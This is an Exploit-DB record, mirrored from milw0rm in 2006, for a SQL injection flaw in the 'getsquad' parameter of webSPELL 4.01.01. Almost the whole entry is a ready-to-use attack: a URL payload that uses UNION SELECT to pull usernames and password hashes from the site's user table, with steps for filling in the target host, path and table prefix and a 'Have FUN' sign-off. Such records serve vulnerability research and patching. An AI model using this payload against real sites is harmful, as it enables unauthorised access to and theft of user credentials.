webSPELL 4.01.01 - 'getsquad' SQL Injection

EDB-ID:

2568


Author:

Kiba

Type:

webapps


Platform:

PHP

Date:

2006-10-15


 # WebSPELL <= 4.01.01 (getsquad) Remote SQL Injection Exploit
 # by: Kiba

 #EXPLOIT:
 http://[PAGE]/[PATH]/index.php?site=squads&getsquad=Where+1=0+Union+Select+1,1,username,1,password,1+from+[PREFIX]_user/*

 #REPLACE:
 (if the website is http://yourwebsite.de/webspell/index.php)
 [PAGE]  with  "yourwebsite.de"
 [PATH]  with  "webspell" (if there is no subdirectory then remove it)
 [PREFIX] the Prefix of the database tables (try "webs_user")

 # Have FUN

# milw0rm.com [2006-10-15]